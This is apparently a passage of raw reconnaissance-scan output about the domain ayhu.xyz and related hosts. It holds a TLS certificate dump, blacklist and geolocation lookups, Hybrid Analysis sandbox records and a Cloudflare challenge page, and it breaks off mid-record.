Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
|
| 2023-05-12 03:10:24 | Malicious IP Address | Yes | Threat Jammer | 0 | 1 | 2 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/188.114.97.1 | 188.114.97.1 |
| 2023-05-12 02:53:35 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://shivanimakvana.github.io/netflix-clone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://shivanimakvana.github.io/Netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-11', u'name': u'Loaded modules', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"iexplore.exe" loaded module "%WINDIR%\\System32\\msvcrt.dll" at 762E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l1-1-0.dll" at 75A20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\advapi32.dll" at 76620000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sechost.dll" at 77940000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcrt4.dll" at 77990000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\iertutil.dll" at 76960000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-version-l1-1-0.dll" at 75820000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\version.dll" at 74C70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-user32-l1-1-0.dll" at 75800000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\user32.dll" at 76550000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gdi32.dll" at 75B90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\lpk.dll" at 76070000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\usp10.dll" at 76080000\n "iexplore.exe" loaded 
module "%WINDIR%\\System32\\api-ms-win-downlevel-normaliz-l1-1-0.dll" at 75830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\normaliz.dll" at 76130000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l1-1-0.dll" at 75840000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shlwapi.dll" at 764E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 000E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 75BE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msctf.dll" at 75AC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptbase.dll" at 755F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shell32-l1-1-0.dll" at 72980000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shell32.dll" at 76BA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\fltLib.dll" at 6CBB0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-core-synch-l1-2-0.dll" at 721C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\secur32.dll" at 75430000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winhttp.dll" at 70E00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\webio.dll" at 70DA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mswsock.dll" at 750C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wship6.dll" at 750B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\IPHLPAPI.DLL" at 74C50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winnsi.dll" at 74C40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\clbcatq.dll" at 768D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netprofm.dll" at 6F2B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nlaapi.dll" at 738B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptsp.dll" at 75100000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 00F90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 74E90000\n 
"iexplore.exe" loaded module "%WINDIR%\\System32\\RpcRtRemote.dll" at 75690000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\npmproxy.dll" at 6E4D0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\ieproxy.dll" at 69B60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WSHTCPIP.DLL" at 74B70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dnsapi.dll" at 74F80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rasadhlp.dll" at 71F10000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\FWPUCLNT.DLL" at 73620000\n "iexplore.exe" loaded module "%WINDIR%\\Fonts\\StaticCache.dat" at 03630000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\setupapi.dll" at 76140000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cfgmgr32.dll" at 75720000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\devobj.dll" at 758A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wshqos.dll" at 70F30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\credssp.dll" at 74DC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\schannel.dll" at 74F00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ncrypt.dll" at 75230000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcrypt.dll" at 75210000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcryptprimitives.dll" at 74DD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wintrust.dll" at 759F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gpapi.dll" at 74CD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\kernel32.dll" at 75C80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\KernelBase.dll" at 75850000\n "iexplore.exe" loaded module "%WINDIR%\\Globalization\\Sorting\\SortDefault.nls" at 00B90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieframe.dll" at 6D200000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ole32.dll" at 76770000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaut32.dll" at 766D0000\n "iexplore.exe" loaded 
module "%WINDIR%\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll" at 74650000\n "iexplore.exe" loaded module "%WINDIR%\\WindowsShell.Manifest" at 00E70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ws2_32.dll" at 75A30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nsi.dll" at 76540000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sspicli.dll" at 75580000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\IEShims.dll" at 69B10000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\comdlg32.dll" at 75C00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcss.dll" at 00590000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\uxtheme.dll" at 743E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\urlmon.dll" at 76390000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-ole32-l1-1-0.dll" at 75810000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wininet.dll" at 75DC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\userenv.dll" at 757E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\profapi.dll" at 75700000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dwmapi.dll" at 73E30000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\sqmapi.dll" at 721D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l2-1-0.dll" at 71450000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat" at 005A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l2-1-0.dll" at 69740000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netapi32.dll" at 73C60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netutils.dll" at 73C50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\srvcli.dll" at 75310000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wkscli.dll" at 73C40000\n 
"iexplore.exe" loaded module "%WINDIR%\\System32\\apphelp.dll" at 755A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\crypt32.dll" at 758C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msasn1.dll" at 75710000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieui.dll" at 69A90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\user32.dll.mui" at 01050000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WindowsCodecs.dll" at 73CF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleacc.dll" at 6D110000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaccrc.dll" at 021F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ExplorerFrame.dll" at 71470000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\duser.dll" at 73F40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dui70.dll" at 73FB0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msimg32.dll" at 72210000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\msctf.dll.mui" at 02940000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc6.dll" at 735C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc.dll" at 74B80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mlang.dll" at 6CB80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\propsys.dll" at 74420000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ntmarta.dll" at 74C10000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Wldap32.dll" at 75A70000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000030.db" at 029B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Macromed\\Flash\\Flash32_27_0_0_187.ocx" at 666E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Macromed\\Flash\\Flash32_27_0_0_187.ocx" at 65290000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\cversions.2.db" at 029A0000\n "iexplore.exe" loaded module 
"%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000016.db" at 02AF0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\cversions.2.db" at 029E0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver | 185.199.109.153 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.5): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:67:D8) | 50.1188, 8.6843 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.159): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:29:45 | Blacklisted IP Address | Yes | UCEPROTECT | 0 | 1 | 3 | 0 | None | UCEPROTECT - Level 2 (some false positives) (46.101.229.70) | 46.101.229.70 |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | nwapi.battleb0t.xyz |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | nuke.battleb0t.xyz |
| 2023-05-12 03:10:23 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [207.154.224.0/20]
http://www.voipbl.org/update | 207.154.224.0/20 |
| 2023-05-12 02:55:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://itm4n.github.io/lsass-runasppl', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "142.251.46.234:443"\n "151.101.1.229:443"\n "142.250.189.163:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e10_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_e10_IE_EarlyTabStart_0x784_Mutex"\n "IsoScope_e10_IESQMMUTEX_0_331"\n "IsoScope_e10_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e10_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3600"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e10_ConnHashTable<3600>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "magnific-popup.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF15F73B092E2A1400.TMP" has type "data"- Location: [%TEMP%\\~DF15F73B092E2A1400.TMP]- [targetUID: 00000000-00003600]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "L4C1VR4B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L4C1VR4B.txt]- [targetUID: 00000000-00003600]\n "~DFE6DB0B57F3EA4B8A.TMP" has type "data"- Location: [%TEMP%\\~DFE6DB0B57F3EA4B8A.TMP]- [targetUID: 00000000-00003600]\n "clipboard.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_01DE0D99-B1E0-11ED-B635-080027FA00EA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "lsass-runasppl_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "localizedFormat.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "GS7U5M1T.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\GS7U5M1T.txt]- [targetUID: 00000000-00003600]\n "S6uyw4BMUTPHvxo_1_.woff" has type "Web Open Font Format TrueType length 34020 version 1.1"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "simple-jekyll-search.min_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "bootstrap-toc.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "lsass-runasppl_2_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_0C8AED11-B1E0-11ED-B635-080027FA00EA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bootstrap-toc.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://itm4n.github.io/lsass-runasppl"\n Pattern match: "https://itm4n.github.io"\n Pattern match: "https://itm4n.github.io/lsass-runasppl/"\n Heuristic match: "Lsc\'.si"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /lsass-runasppl HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like 
Gecko\nAccept-Encoding: gzip, deflate\nHost: itm4n.github.io\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 301 Moved Permanently\nConnection: keep-alive\nContent-Length: 162\nServer: GitHub.com\nContent-Type: text/html\npermissions-policy: interest-cohort=()\nx-origin-cache: HIT\nLocation: https://itm4n.github.io/lsass-runasppl/\nAccess-Control-Allow-Origin: *\nStrict-Transport-Security: max-age=31556952\nexpires: Tue, 21 Feb 2023 13:15:27 GMT\nCache-Control: max-age=600\nx-proxy-cache: MISS\nX-GitHub-Request-Id: 285E:9A97:2F5E56:376309:63F4C196\nAccept-Ranges: bytes\nDate: Tue, 21 Feb 2023 13:05:27 GMT\nVia: 1.1 varnish\nAge: 0\nX-Served-By: cache-sjc10044-SJC\nX-Cache: MISS\nX-Cache-Hits: 0\nX-Timer: S1676984727.973288,VS0,VE86\nVary: Accept-Encoding\nX-Fastly-Request-ID: 8917d38f4255e27c3ee7d2913db826c19a210b67"\n "<html>\n<head><title>301 Moved Permanently</title></head>\n<body>\n<center><h1>301 Moved Permanently</h1></center>\n<hr><center>nginx</center>\n</body>\n</html>"\n "GET /lsass-runasppl/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: itm4n.github.io\nConnection: Keep-Alive\nDNT: 1" | 185.199.109.153 |
| 2023-05-12 03:16:24 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.97.1', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} | 188.114.97.1 |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5e7988238a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13063',
cRay: '7c5f8c5e7988238a',
cHash: 'ba708169066f393',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5e7988238a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5e7988238a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MOZAMBIQUE345 (Net ID: 00:01:E3:54:D4:57) | 52.3759, 4.8975 |
| 2023-05-12 02:54:57 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-08T23:15:43.655Z", "ip": "2a06:98c1:3120::1", "location_updated_at": "2023-04-30T00:57:18.734276Z", "autonomous_system_updated_at": "2023-04-30T00:57:18.734351Z", "location": {"province": "England", "city": "Hounslow", "country": "United Kingdom", "coordinates": {"latitude": 51.46839, "longitude": -0.36092}, "postal_code": "TW3", "country_code": "GB", "timezone": "Europe/London", "continent": "Europe"}, "dns": {"records": {"karriere-job-booster.com": {"record_type": "AAAA", "resolved_at": "2023-03-23T15:40:36.428770073Z"}, "uncoveryourconfidence.org": {"record_type": "AAAA", "resolved_at": "2023-03-24T20:43:37.500409594Z"}, "panel.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-28T16:39:39.161526355Z"}, 